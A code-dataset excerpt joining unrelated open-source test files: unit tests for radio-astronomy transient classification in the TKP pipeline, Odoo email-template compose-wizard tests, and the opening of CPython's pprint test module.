        self.img_params[1]['rms_qc']*=rms_decrease_factor
        self.img_params[1]['rms_min']*=rms_decrease_factor
        self.img_params[1]['rms_max']*=rms_decrease_factor

    def tearDown(self):
        # Never commit: each test runs against a rolled-back transaction.
        tkp.db.rollback()

    def test_certain_transient(self):
        """
        flux1 > (rms_max0*(det0+margin)
            --> Definite transient

        Nice and bright, must be new - mark it definite transient.
        """
        img_params = self.img_params

        bright_transient = MockSource(
            example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
                                          dec=img_params[0]['centre_decl']),
            lightcurve={img_params[1]['taustart_ts']:
                            self.always_detectable_flux}
        )
        #First, check that we've set up the test correctly:
        rms_max0 = img_params[0]['rms_max']
        det0 = img_params[0]['detection_thresh']
        self.assertTrue(bright_transient.lightcurve.values()[0] >
                            rms_max0*(det0 + self.new_source_sigma_margin ) )

        for pars in self.img_params:
            img = tkp.db.Image(data=pars,dataset=self.dataset)
            xtr = bright_transient.simulate_extraction(img,
                                                    extraction_type='blind')
            if xtr is not None:
                insert_extracted_sources(img._id, [xtr], 'blind')
            associate_extracted_sources(img._id, deRuiter_r, self.new_source_sigma_margin)

        newsources = get_newsources_for_dataset(self.dataset.id)

        #Should have one 'definite' transient
        self.assertEqual(len(newsources),1)

        # Bright relative to both the best- and worst-case first-image RMS.
        self.assertTrue(
            newsources[0]['low_thresh_sigma'] > self.new_source_sigma_margin)
        self.assertTrue(
            newsources[0]['high_thresh_sigma'] > self.new_source_sigma_margin)
        self.assertTrue(
            newsources[0]['low_thresh_sigma'] >
            newsources[0]['high_thresh_sigma'])

    def test_marginal_transient(self):
        """
        ( flux1 > (rms_min0*(det0 + margin) )
        but ( flux1 < (rms_max0*(det0 + margin) )
            --> Possible transient

        If it was in a region of rms_min, we would (almost certainly) have seen
        it in the first image. So new source --> Possible transient.
        But if it was in a region of rms_max, then perhaps we would have missed
        it. In which case, new source --> Just seeing deeper.

        Note that if we are tiling overlapping images, then the first time
        a field is processed with image-centre at the edge of the old field,
        we may get a bunch of unhelpful 'possible transients'.

        Furthermore, this will pick up fluctuating sources near the
        image-margins even with a fixed field of view.
        But without a more complex store of image-rms-per-position, we cannot
        do better.
        Hopefully we can use a 'distance from centre' feature to separate out
        the good and bad candidates in this case.
        """
        img_params = self.img_params

        #Must pick flux value carefully to fire correct logic branch:
        marginal_transient_flux = self.reliably_detected_at_image_centre_flux

        marginal_transient = MockSource(
            example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
                                          dec=img_params[0]['centre_decl']),
            lightcurve={img_params[1]['taustart_ts'] : marginal_transient_flux}
        )

        # First, check that we've set up the test correctly
        rms_min0 = img_params[0]['rms_min']
        rms_max0 = img_params[0]['rms_max']
        det0 = img_params[0]['detection_thresh']
        self.assertTrue(marginal_transient_flux <
                        rms_max0 * (det0 + self.new_source_sigma_margin))
        self.assertTrue(marginal_transient_flux >
                        rms_min0 * (det0 + self.new_source_sigma_margin))

        for pars in self.img_params:
            img = tkp.db.Image(data=pars, dataset=self.dataset)
            xtr = marginal_transient.simulate_extraction(img,
                                                    extraction_type='blind')
            if xtr is not None:
                insert_extracted_sources(img._id, [xtr], 'blind')
            associate_extracted_sources(img._id, deRuiter_r, self.new_source_sigma_margin)

        newsources = get_newsources_for_dataset(self.dataset.id)

        # Should have one 'possible' transient
        self.assertEqual(len(newsources), 1)
        # Above margin for the low-RMS case, below it for the high-RMS case.
        self.assertTrue(
            newsources[0]['low_thresh_sigma'] > self.new_source_sigma_margin)
        self.assertTrue(
            newsources[0]['high_thresh_sigma'] < self.new_source_sigma_margin)

    def test_probably_not_a_transient(self):
        """
        ( flux1 < (rms_min0*(det0 + margin) )
        --> Probably not a transient

        NB even if
        avg_source_flux == rms_min0*det0 + epsilon
        we might not detect it in the
        first image, due to noise fluctuations. So we provide the
        user-tunable marginal_detection_thresh, to ignore these 'noise'
        transients.
        """
        img_params = self.img_params
        img0 = img_params[0]

        marginal_steady_src_flux = self.barely_detectable_flux

        # This time around, we just manually exclude the steady src from
        # the first image detections.
        marginal_steady_src = MockSource(
            example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
                                          dec=img_params[0]['centre_decl']
                                          ),
            lightcurve=defaultdict(lambda :marginal_steady_src_flux)
        )

        # First, check that we've set up the test correctly
        rms_min0 = img_params[0]['rms_min']
        det0 = img_params[0]['detection_thresh']
        self.assertTrue(marginal_steady_src_flux <
                        rms_min0 * (det0 + self.new_source_sigma_margin))

        # Insert first image, no sources.
        tkp.db.Image(data=img_params[0], dataset=self.dataset)
        # Now set up second image.
        img1 = tkp.db.Image(data=img_params[1], dataset=self.dataset)
        xtr = marginal_steady_src.simulate_extraction(img1,
                                                    extraction_type='blind')
        insert_extracted_sources(img1._id, [xtr], 'blind')
        associate_extracted_sources(img1._id, deRuiter_r, self.new_source_sigma_margin)
        newsources = get_newsources_for_dataset(self.dataset.id)
        # Should have no flagged new sources
        self.assertEqual(len(newsources), 0)
class TestIncreasingImageRMS(unittest.TestCase):
    """A steady source dropping below the blind-detection threshold because
    the second image is noisier must trigger a forced fit, not a transient."""

    def shortDescription(self):
        # Suppress docstring-derived test descriptions in unittest output.
        return None

    @requires_database()
    def setUp(self):
        """Two images; the second has its RMS values doubled."""
        self.database = tkp.db.Database()
        self.dataset = tkp.db.DataSet(
            data={'description':"Trans:" +self._testMethodName},
            database=self.database)

        self.n_images = 2
        self.rms_min_initial = 2e-3 #2mJy
        self.rms_max_initial = 5e-3 #5mJy
        self.new_source_sigma_margin = 3
        self.detection_thresh=10

        dt=self.detection_thresh
        self.barely_detectable_flux = 1.01*dt*self.rms_min_initial

        test_specific_img_params = dict(rms_qc = self.rms_min_initial,
                                rms_min = self.rms_min_initial,
                                rms_max = self.rms_max_initial,
                                detection_thresh = self.detection_thresh)

        self.img_params = db_subs.generate_timespaced_dbimages_data(
            self.n_images, **test_specific_img_params)
        #Increase RMS to 4 mJy / 10mJy in second image.
        rms_increase_factor = 2.0
        self.img_params[1]['rms_qc']*=rms_increase_factor
        self.img_params[1]['rms_min']*=rms_increase_factor
        self.img_params[1]['rms_max']*=rms_increase_factor

        self.search_params = dict(eta_min=1,
                                  v_min=0.1,
                                  # minpoints=1,
                                  )

    def tearDown(self):
        # Never commit: each test runs against a rolled-back transaction.
        tkp.db.rollback()

    def test_null_detection_business_as_usual(self):
        """
        If we do not blindly extract a steady source due to increased RMS,
        then we expect a null-detection forced-fit to be triggered.

        However, if the source properties are steady, this should not
        result in the source being identified as transient.
        """
        img0 = self.img_params[0]
        steady_src_flux = self.barely_detectable_flux
        steady_src = MockSource(
            example_extractedsource_tuple(ra=img0['centre_ra'],
                                          dec=img0['centre_decl']
                                          ),
            lightcurve=defaultdict(lambda :steady_src_flux)
        )

        # First image: blind detection, no forced fits.
        image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
            self.dataset,self.img_params[0],[steady_src],
            self.new_source_sigma_margin)
        self.assertEqual(len(blind_xtr),1)
        self.assertEqual(len(forced_fits),0)

        # Second (noisier) image: no blind detection, one forced fit.
        image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
            self.dataset,self.img_params[1],[steady_src],
            self.new_source_sigma_margin)
        self.assertEqual(len(blind_xtr),0)
        self.assertEqual(len(forced_fits),1)

        get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
                                                  **self.search_params)
        transients=get_newsources_for_dataset(self.dataset.id)
        self.assertEqual(len(transients),0)
class TestMultipleFrequencyBands(unittest.TestCase):
    """
    We expect to see some steady sources in only one frequency band,
    due to steep spectral indices. We don't want to misclassify these as
    transient without any proof of variability!
    """
    def shortDescription(self):
        # Returning None suppresses docstring display in test output.
        return None

    @requires_database()
    def setUp(self):
        self.database = tkp.db.Database()
        self.dataset = tkp.db.DataSet(
            data={'description':"Trans:" +self._testMethodName},
            database=self.database)

        self.n_images = 2
        self.rms_min = 1e-3 #1mJy
        self.rms_max = 2e-3 #2mJy
        self.new_source_sigma_margin = 3
        self.detection_thresh=10

        self.first_image_freq = 250e6 # 250 MHz
        self.second_image_freq = 50e6 # 50 MHz

        dt=self.detection_thresh
        margin = self.new_source_sigma_margin
        # Bright enough to clear detection-threshold + sigma-margin even
        # against the worst-case (rms_max) noise level.
        self.always_detectable_flux = 1.01*self.rms_max*(dt+ margin)

        self.search_params = dict(eta_min=1,
                                  v_min=0.1,
                                  minpoints=1, )

        test_specific_img_params = dict(
            freq_eff = self.first_image_freq,
            rms_qc = self.rms_min,
            rms_min = self.rms_min,
            rms_max = self.rms_max,
            detection_thresh = self.detection_thresh)

        self.img_params = db_subs.generate_timespaced_dbimages_data(
            self.n_images, **test_specific_img_params)
        # Second image is observed in a different frequency band.
        self.img_params[1]['freq_eff']=self.second_image_freq

    def tearDown(self):
        # Roll back so each test leaves the database unchanged.
        tkp.db.rollback()

    def test_probably_not_a_transient(self):
        """
        No source at 250MHz, but we detect a source at 50MHz.
        Not necessarily a transient.
        Should trivially ignore 250MHz data when looking at a new 50MHz source.
        """
        img_params = self.img_params
        # NOTE(review): img0 is unused below; img_params[0] is referenced
        # directly when building the mock source.
        img0 = img_params[0]

        # This time around, we just manually exclude the steady src from
        # the first image detections.
        steady_low_freq_src = MockSource(
            example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
                                          dec=img_params[0]['centre_decl']
                                          ),
            lightcurve=defaultdict(lambda :self.always_detectable_flux)
        )

        # Insert first image, no sources.
        tkp.db.Image(data=img_params[0],dataset=self.dataset)
        # Now set up second image.
        img1 = tkp.db.Image(data=img_params[1],dataset=self.dataset)
        xtr = steady_low_freq_src.simulate_extraction(img1,
                                                      extraction_type='blind')
        insert_extracted_sources(img1._id, [xtr], 'blind')
        associate_extracted_sources(img1._id, deRuiter_r, self.new_source_sigma_margin)
        transients = get_newsources_for_dataset(self.dataset.id)
        # Should have no marked transients
        self.assertEqual(len(transients), 0)
class TestPreviousLimitsImageId(unittest.TestCase):
    """
    If we have several previous images with non-detections at a position,
    and then we find a new source, we should store the ID of the image with
    the best previous upper limits, so we can later run queries to see how
    decisively 'new' (i.e. how much brighter than previous limits)
    the new source is.
    """
    def shortDescription(self):
        # Returning None suppresses docstring display in test output.
        return None

    @requires_database()
    def setUp(self):
        self.database = tkp.db.Database()
        self.dataset = tkp.db.DataSet(
            data={'description':"Trans:" +self._testMethodName},
            database=self.database)

        self.n_images = 8
        self.rms_min_initial = 2e-3 #2mJy
        self.rms_max_initial = 5e-3 #5mJy
        self.new_source_sigma_margin = 3
        self.detection_thresh=10

        dt=self.detection_thresh
        margin = self.new_source_sigma_margin
        # Bright enough to be confidently detected even against the
        # worst-case (rms_max) noise level.
        self.always_detectable_flux = 1.01*(dt+ margin)*self.rms_max_initial

        self.search_params = dict(eta_min=1,
                                  v_min=0.1,
                                  # minpoints=1,
                                  )

        test_specific_img_params = dict(rms_qc = self.rms_min_initial,
                                rms_min = self.rms_min_initial,
                                rms_max = self.rms_max_initial,
                                detection_thresh = self.detection_thresh)

        self.img_params = db_subs.generate_timespaced_dbimages_data(
            self.n_images, **test_specific_img_params)

        #Raise RMS in images 0,1,2,6 so they give poorer upper limits.
        rms_keys = ['rms_qc', 'rms_min', 'rms_max']
        rms_increase_factor = 1.2
        for img_index in (0,1,2,6):
            for k in rms_keys:
                self.img_params[img_index][k]*=rms_increase_factor

        # Now, images 3,4,5 are equally good. But if we raise the rms_max in
        # images, 3,5 (leave rms_min equal) then we should pick 4 as the best.
        # (NB Careful ordering - ensures we're not just picking the best by
        # default due to it being first or last in the matching set.)
        for img_index in (3,5):
            self.img_params[img_index]['rms_max']*=rms_increase_factor

        #Drop RMS significantly in last image so we get a detection. (index=7)
        rms_decrease_factor = 0.5
        for k in rms_keys:
            self.img_params[-1][k]*=rms_decrease_factor

    def tearDown(self):
        # Roll back so each test leaves the database unchanged.
        tkp.db.rollback()

    def test_previous_image_id(self):
        img_params = self.img_params

        # Two sources that only light up in the final image; their earlier
        # non-detections should record the best prior upper limit.
        mock_sources=[]
        mock_sources.append( MockSource(
            example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
                                          dec=img_params[0]['centre_decl']),
            lightcurve={img_params[-1]['taustart_ts']:
                            self.always_detectable_flux}
        ))
        mock_sources.append( MockSource(
            example_extractedsource_tuple(ra=img_params[0]['centre_ra']+1,
                                          dec=img_params[0]['centre_decl']),
            lightcurve={img_params[-1]['taustart_ts']:
                            self.always_detectable_flux}
        ))

        image_ids={}
        for img_idx in xrange(self.n_images):
            image, _,_ = insert_image_and_simulated_sources(
                self.dataset,self.img_params[img_idx],mock_sources,
                self.new_source_sigma_margin)
            image_ids[img_idx]=image.id

        newsources = get_newsources_for_dataset(self.dataset.id)
        self.assertEqual(len(newsources),len(mock_sources))
        newsource_properties = newsources[0]
        # Image 4 is the only pre-detection image with both the lowest
        # rms_min and the lowest rms_max, so it must be recorded as
        # supplying the best previous upper limit.
        # (A leftover debug ``print`` of image_ids was removed here:
        # tests should not write to stdout.)
        self.assertEqual(newsource_properties['previous_limits_image'],
                         image_ids[4])
class TestMultipleSourceField(unittest.TestCase):
    """
    By testing a field with multiple sources, we at least go some way
    to ensuring there is no misclassification in the SQL queries
    when we have multiple transient candidates in play.
    """
    @requires_database()
    def setUp(self):
        self.database = tkp.db.Database()
        self.dataset = tkp.db.DataSet(
            data={'description':"Trans:" +self._testMethodName},
            database=self.database)

        self.n_images = 8
        self.image_rms = 1e-3 # 1mJy
        self.new_source_sigma_margin = 3
        self.search_params = dict(eta_min=1,
                                  v_min=0.1,
                                  # minpoints=1,
                                  )

        detection_thresh=10
        # Just above the blind-detection threshold...
        barely_detectable_flux = 1.01*self.image_rms*(detection_thresh)
        # ...vs. above threshold + sigma-margin (confident new detection).
        reliably_detectable_flux = (
            1.01*self.image_rms*(detection_thresh+self.new_source_sigma_margin))

        test_specific_img_params = dict(rms_qc =self.image_rms,
                                rms_min = self.image_rms,
                                rms_max = self.image_rms,
                                detection_thresh = detection_thresh)

        self.img_params = db_subs.generate_timespaced_dbimages_data(
            self.n_images, **test_specific_img_params)
        imgs=self.img_params

        first_img = imgs[0]
        centre_ra = first_img['centre_ra']
        centre_decl = first_img['centre_decl']
        xtr_radius = first_img['xtr_radius']

        #At centre
        fixed_source = MockSource(
            example_extractedsource_tuple(ra=centre_ra, dec=centre_decl),
            lightcurve=defaultdict(lambda: barely_detectable_flux))

        #How many transients should we know about after each image?
        # (defaultdicts keyed by image index; incremented per mock source below)
        self.n_transients_after_image = defaultdict(lambda:0)
        self.n_newsources_after_image = defaultdict(lambda:0)

        #shifted to +ve RA
        bright_fast_transient = MockSource(
            example_extractedsource_tuple(ra=centre_ra + xtr_radius * 0.5,
                                          dec=centre_decl),
            lightcurve={imgs[3]['taustart_ts']: reliably_detectable_flux}
        )
        #Detect immediately
        for img_idx in range(3,self.n_images):
            self.n_newsources_after_image[img_idx]+=1
        #But only variable after non-detection
        for img_idx in range(4,self.n_images):
            self.n_transients_after_image[img_idx]+=1

        # shifted to -ve RA
        weak_fast_transient = MockSource(
            example_extractedsource_tuple(ra=centre_ra - xtr_radius * 0.5,
                                          dec=centre_decl),
            lightcurve={imgs[3]['taustart_ts']: barely_detectable_flux}
        )
        # Not flagged as a newsource, could just be a weakly detected
        # steady-source at first.
        # But, shows high-variance after forced-fit in image[4]
        for img_idx in range(4,self.n_images):
            self.n_transients_after_image[img_idx]+=1

        # shifted to +ve Dec
        weak_slow_transient = MockSource(
            example_extractedsource_tuple(ra=centre_ra,
                                          dec=centre_decl + xtr_radius * 0.5),
            lightcurve={imgs[5]['taustart_ts']: barely_detectable_flux,
                        imgs[6]['taustart_ts']: barely_detectable_flux*0.95}
        )
        # Not flagged as a newsource, could just be a weakly detected
        # steady-source at first.
        # Should not be flagged as transient until forced-fit in image[7]
        for img_idx in range(7,self.n_images):
            self.n_transients_after_image[img_idx]+=1

        self.all_mock_sources = [fixed_source, weak_slow_transient,
                                 bright_fast_transient, weak_fast_transient]

    def tearDown(self):
        # Roll back so each test leaves the database unchanged.
        tkp.db.rollback()

    def test_full_transient_search_routine(self):
        # Insert the images one at a time, checking the transient count
        # after each against the expectations built up in setUp.
        inserted_imgs = []
        for img_idx in xrange(self.n_images):
            image, _,_ = insert_image_and_simulated_sources(
                self.dataset,self.img_params[img_idx],self.all_mock_sources,
                self.new_source_sigma_margin)
            inserted_imgs.append(image)
            transients = get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
                                             **self.search_params)
            # NOTE(review): newsources is fetched but never asserted inside
            # this loop.
            newsources = get_newsources_for_dataset(self.dataset.id)
            self.assertEqual(len(transients),
                             self.n_transients_after_image[img_idx])

        #Sanity check that everything went into one band
        bands = frequency_bands(self.dataset._id)
        self.assertEqual(len(bands), 1)

        all_transients = get_sources_filtered_by_final_variability(
            dataset_id=self.dataset.id, **self.search_params)
        # for t in all_transients:
        #     print "V_int:", t['v_int'], "  eta_int:", t['eta_int']

        #Now test thresholding:
        more_highly_variable = sum(t['v_int'] > 2.0 for t in all_transients)
        very_non_flat = sum(t['eta_int'] > 100.0 for t in all_transients)

        high_v_transients = get_sources_filtered_by_final_variability(
            eta_min=1.1,
            v_min=2.0,
            dataset_id=self.dataset.id,
            # minpoints=1
        )
        self.assertEqual(len(high_v_transients), more_highly_variable)

        high_eta_transients = get_sources_filtered_by_final_variability(
            eta_min=100,
            v_min=0.01,
            dataset_id=self.dataset.id,
            # minpoints=1
        )
        self.assertEqual(len(high_eta_transients), very_non_flat)
| bsd-2-clause |
shaufi10/odoo | addons/email_template/tests/test_mail.py | 190 | 14322 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
from openerp.addons.mail.tests.common import TestMail
from openerp.tools import mute_logger
class test_message_compose(TestMail):
    """Tests for the mail.compose.message wizard as extended by email_template."""

    def setUp(self):
        super(test_message_compose, self).setUp()

        # create a 'pigs' and 'bird' groups that will be used through the various tests
        self.group_bird_id = self.mail_group.create(self.cr, self.uid,
            {'name': 'Bird', 'description': 'I am angry !'})

    def test_00_message_compose_wizard(self):
        """ Tests designed for the mail.compose.message wizard updated by email_template. """
        cr, uid = self.cr, self.uid
        mail_compose = self.registry('mail.compose.message')
        self.res_users.write(cr, uid, [uid], {'signature': 'Admin', 'email': 'a@a.a'})
        user_admin = self.res_users.browse(cr, uid, uid)
        p_a_id = user_admin.partner_id.id
        group_pigs = self.mail_group.browse(cr, uid, self.group_pigs_id)
        group_bird = self.mail_group.browse(cr, uid, self.group_bird_id)

        # Mail data
        _subject1 = 'Pigs'
        _subject2 = 'Bird'
        _body_html1 = 'Fans of Pigs, unite !'
        _body_html2 = 'I am angry !'
        _attachments = [
            {'name': 'First', 'datas_fname': 'first.txt', 'datas': base64.b64encode('My first attachment'), 'res_model': 'res.partner', 'res_id': self.partner_admin_id},
            {'name': 'Second', 'datas_fname': 'second.txt', 'datas': base64.b64encode('My second attachment'), 'res_model': 'res.partner', 'res_id': self.partner_admin_id},
        ]
        _attachments_test = [('first.txt', 'My first attachment'), ('second.txt', 'My second attachment')]

        # Create template on mail.group, with attachments
        group_model_id = self.registry('ir.model').search(cr, uid, [('model', '=', 'mail.group')])[0]
        email_template = self.registry('email.template')
        email_template_id = email_template.create(cr, uid, {
            'model_id': group_model_id,
            'name': 'Pigs Template',
            'subject': '${object.name}',
            'body_html': '${object.description}',
            'user_signature': False,
            'attachment_ids': [(0, 0, _attachments[0]), (0, 0, _attachments[1])],
            'email_to': 'b@b.b, c@c.c',
            'email_cc': 'd@d.d'
        })

        # ----------------------------------------
        # CASE1: comment and save as template
        # ----------------------------------------

        # 1. Comment on pigs
        compose_id = mail_compose.create(cr, uid,
            {'subject': 'Forget me subject', 'body': '<p>Dummy body</p>'},
            {'default_composition_mode': 'comment',
                'default_model': 'mail.group',
                'default_res_id': self.group_pigs_id,
                'active_ids': [self.group_pigs_id, self.group_bird_id]})
        compose = mail_compose.browse(cr, uid, compose_id)

        # 2. Save current composition form as a template
        mail_compose.save_as_template(cr, uid, [compose_id], context={'default_model': 'mail.group'})

        # Test: email_template subject, body_html, model
        last_template_id = email_template.search(cr, uid, [('model', '=', 'mail.group'), ('subject', '=', 'Forget me subject')], limit=1)[0]
        self.assertTrue(last_template_id, 'email_template not found for model mail.group, subject Forget me subject')
        last_template = email_template.browse(cr, uid, last_template_id)
        self.assertEqual(last_template.body_html, '<p>Dummy body</p>', 'email_template incorrect body_html')

        # ----------------------------------------
        # CASE2: comment with template, save as template
        # ----------------------------------------

        # 1. Comment on pigs
        context = {
            'default_composition_mode': 'comment',
            'default_model': 'mail.group',
            'default_res_id': self.group_pigs_id,
            'default_use_template': False,
            'default_template_id': email_template_id,
            'active_ids': [self.group_pigs_id, self.group_bird_id]
        }
        compose_id = mail_compose.create(cr, uid, {'subject': 'Forget me subject', 'body': 'Dummy body'}, context)
        compose = mail_compose.browse(cr, uid, compose_id, context)
        # Apply the template via the onchange; convert the returned id lists
        # into (4, id) "link" commands for the write.
        onchange_res = compose.onchange_template_id(email_template_id, 'comment', 'mail.group', self.group_pigs_id)['value']
        onchange_res['partner_ids'] = [(4, partner_id) for partner_id in onchange_res.pop('partner_ids', [])]
        onchange_res['attachment_ids'] = [(4, attachment_id) for attachment_id in onchange_res.pop('attachment_ids', [])]
        compose.write(onchange_res)
        compose.refresh()

        message_pids = [partner.id for partner in compose.partner_ids]
        partner_ids = self.res_partner.search(cr, uid, [('email', 'in', ['b@b.b', 'c@c.c', 'd@d.d'])])
        # Test: mail.compose.message: subject, body, partner_ids
        self.assertEqual(compose.subject, _subject1, 'mail.compose.message subject incorrect')
        self.assertIn(_body_html1, compose.body, 'mail.compose.message body incorrect')
        self.assertEqual(set(message_pids), set(partner_ids), 'mail.compose.message partner_ids incorrect')

        # Test: mail.compose.message: attachments (owner has not been modified)
        for attach in compose.attachment_ids:
            self.assertEqual(attach.res_model, 'res.partner', 'mail.compose.message attachment res_model through template was overridden')
            self.assertEqual(attach.res_id, self.partner_admin_id, 'mail.compose.message attachment res_id incorrect')
            self.assertIn((attach.datas_fname, base64.b64decode(attach.datas)), _attachments_test,
                          'mail.message attachment name / data incorrect')

        # Test: mail.message: attachments
        mail_compose.send_mail(cr, uid, [compose_id])
        group_pigs.refresh()
        message_pigs = group_pigs.message_ids[0]
        for attach in message_pigs.attachment_ids:
            self.assertEqual(attach.res_model, 'mail.group', 'mail.compose.message attachment res_model through template was overridden')
            self.assertEqual(attach.res_id, self.group_pigs_id, 'mail.compose.message attachment res_id incorrect')
            self.assertIn((attach.datas_fname, base64.b64decode(attach.datas)), _attachments_test,
                          'mail.message attachment name / data incorrect')

        # ----------------------------------------
        # CASE3: mass_mail with template
        # ----------------------------------------

        # 1. Mass_mail on pigs and bird, with a default_partner_ids set to check he is correctly added
        context = {
            'default_composition_mode': 'mass_mail',
            'default_notify': True,
            'default_model': 'mail.group',
            'default_res_id': self.group_pigs_id,
            'default_template_id': email_template_id,
            'default_partner_ids': [p_a_id],
            'active_ids': [self.group_pigs_id, self.group_bird_id]
        }
        compose_id = mail_compose.create(cr, uid, {'subject': 'Forget me subject', 'body': 'Dummy body'}, context)
        compose = mail_compose.browse(cr, uid, compose_id, context)
        onchange_res = compose.onchange_template_id(email_template_id, 'mass_mail', 'mail.group', self.group_pigs_id)['value']
        onchange_res['partner_ids'] = [(4, partner_id) for partner_id in onchange_res.pop('partner_ids', [])]
        onchange_res['attachment_ids'] = [(4, attachment_id) for attachment_id in onchange_res.pop('attachment_ids', [])]
        compose.write(onchange_res)
        compose.refresh()

        message_pids = [partner.id for partner in compose.partner_ids]
        partner_ids = [p_a_id]
        # In mass-mail mode the template placeholders stay unrendered until send.
        self.assertEqual(compose.subject, '${object.name}', 'mail.compose.message subject incorrect')
        self.assertEqual(compose.body, '<p>${object.description}</p>', 'mail.compose.message body incorrect')  # todo: check signature
        self.assertEqual(set(message_pids), set(partner_ids), 'mail.compose.message partner_ids incorrect')

        # 2. Post the comment, get created message
        mail_compose.send_mail(cr, uid, [compose_id], {'default_res_id': -1, 'active_ids': [self.group_pigs_id, self.group_bird_id]})
        group_pigs.refresh()
        group_bird.refresh()
        message_pigs = group_pigs.message_ids[0]
        message_bird = group_bird.message_ids[0]
        # Test: subject, body
        self.assertEqual(message_pigs.subject, _subject1, 'mail.message subject on Pigs incorrect')
        self.assertEqual(message_bird.subject, _subject2, 'mail.message subject on Bird incorrect')
        self.assertIn(_body_html1, message_pigs.body, 'mail.message body on Pigs incorrect')
        self.assertIn(_body_html2, message_bird.body, 'mail.message body on Bird incorrect')
        # Test: partner_ids: p_a_id (default) + 3 newly created partners
        # message_pigs_pids = [partner.id for partner in message_pigs.notified_partner_ids]
        # message_bird_pids = [partner.id for partner in message_bird.notified_partner_ids]
        # partner_ids = self.res_partner.search(cr, uid, [('email', 'in', ['b@b.b', 'c@c.c', 'd@d.d'])])
        # partner_ids.append(p_a_id)
        # self.assertEqual(set(message_pigs_pids), set(partner_ids), 'mail.message on pigs incorrect number of notified_partner_ids')
        # self.assertEqual(set(message_bird_pids), set(partner_ids), 'mail.message on bird notified_partner_ids incorrect')

        # ----------------------------------------
        # CASE4: test newly introduced partner_to field
        # ----------------------------------------

        # get already-created partners back
        p_b_id = self.res_partner.search(cr, uid, [('email', '=', 'b@b.b')])[0]
        p_c_id = self.res_partner.search(cr, uid, [('email', '=', 'c@c.c')])[0]
        p_d_id = self.res_partner.search(cr, uid, [('email', '=', 'd@d.d')])[0]
        # modify template: use partner_to, use template and email address in email_to to test all features together
        user_model_id = self.registry('ir.model').search(cr, uid, [('model', '=', 'res.users')])[0]
        email_template.write(cr, uid, [email_template_id], {
            'model_id': user_model_id,
            'body_html': '${object.login}',
            'email_to': '${object.email}, c@c.c',
            'partner_to': '%i,%i' % (p_b_id, p_c_id),
            'email_cc': 'd@d.d',
        })
        # partner by email + partner by id (no double)
        send_to = [p_a_id, p_b_id, p_c_id, p_d_id]
        # Generate message with default email and partner on template
        mail_value = mail_compose.generate_email_for_composer(cr, uid, email_template_id, uid)
        self.assertEqual(set(mail_value['partner_ids']), set(send_to), 'mail.message partner_ids list created by template is incorrect')

    @mute_logger('openerp.models')
    def test_10_email_templating(self):
        """ Tests designed for the mail.compose.message wizard updated by email_template. """
        cr, uid, context = self.cr, self.uid, {}

        # create the email.template on mail.group model
        group_model_id = self.registry('ir.model').search(cr, uid, [('model', '=', 'mail.group')])[0]
        email_template = self.registry('email.template')
        email_template_id = email_template.create(cr, uid, {
            'model_id': group_model_id,
            'name': 'Pigs Template',
            'email_from': 'Raoul Grosbedon <raoul@example.com>',
            'subject': '${object.name}',
            'body_html': '${object.description}',
            'user_signature': True,
            'email_to': 'b@b.b, c@c.c',
            'email_cc': 'd@d.d',
            'partner_to': '${user.partner_id.id},%s,%s,-1' % (self.user_raoul.partner_id.id, self.user_bert.partner_id.id)
        })

        # not force send: email_recipients is not taken into account
        msg_id = email_template.send_mail(cr, uid, email_template_id, self.group_pigs_id, context=context)
        mail = self.mail_mail.browse(cr, uid, msg_id, context=context)
        self.assertEqual(mail.subject, 'Pigs', 'email_template: send_mail: wrong subject')
        self.assertEqual(mail.email_to, 'b@b.b, c@c.c', 'email_template: send_mail: wrong email_to')
        self.assertEqual(mail.email_cc, 'd@d.d', 'email_template: send_mail: wrong email_cc')
        self.assertEqual(
            set([partner.id for partner in mail.recipient_ids]),
            set((self.partner_admin_id, self.user_raoul.partner_id.id, self.user_bert.partner_id.id)),
            'email_template: send_mail: wrong management of partner_to')

        # force send: take email_recipients into account
        email_template.send_mail(cr, uid, email_template_id, self.group_pigs_id, force_send=True, context=context)
        sent_emails = self._build_email_kwargs_list
        email_to_lst = [
            ['b@b.b', 'c@c.c'], ['Administrator <admin@yourcompany.example.com>'],
            ['Raoul Grosbedon <raoul@raoul.fr>'], ['Bert Tartignole <bert@bert.fr>']]
        self.assertEqual(len(sent_emails), 4, 'email_template: send_mail: 3 valid email recipients + email_to -> should send 4 emails')
        for email in sent_emails:
            self.assertIn(email['email_to'], email_to_lst, 'email_template: send_mail: wrong email_recipients')
| agpl-3.0 |
jsteemann/arangodb | 3rdParty/V8-4.3.61/third_party/python_26/Lib/test/test_pprint.py | 55 | 24560 | import pprint
import test.test_support
import unittest
import test.test_set
def _identity(x):
    """Fallback for ``uni`` on Python 3, where str is already unicode."""
    return x

# On Python 2 ``uni`` converts to the ``unicode`` type; on Python 3 the
# name ``unicode`` does not exist, so ``uni`` becomes a no-op.
try:
    uni = unicode
except NameError:
    uni = _identity
# list, tuple and dict subclasses that do or don't overwrite __repr__
class list2(list):
    """list subclass that does NOT override __repr__."""
    pass
class list3(list):
    """list subclass that overrides __repr__ but delegates to list's."""

    def __repr__(self):
        return super(list3, self).__repr__()
class tuple2(tuple):
    """tuple subclass that does NOT override __repr__."""
    pass
class tuple3(tuple):
    """tuple subclass that overrides __repr__ but delegates to tuple's."""

    def __repr__(self):
        return super(tuple3, self).__repr__()
class dict2(dict):
    """dict subclass that does NOT override __repr__."""
    pass
class dict3(dict):
    """dict subclass that overrides __repr__ but delegates to dict's."""

    def __repr__(self):
        return super(dict3, self).__repr__()
class QueryTestCase(unittest.TestCase):
    def setUp(self):
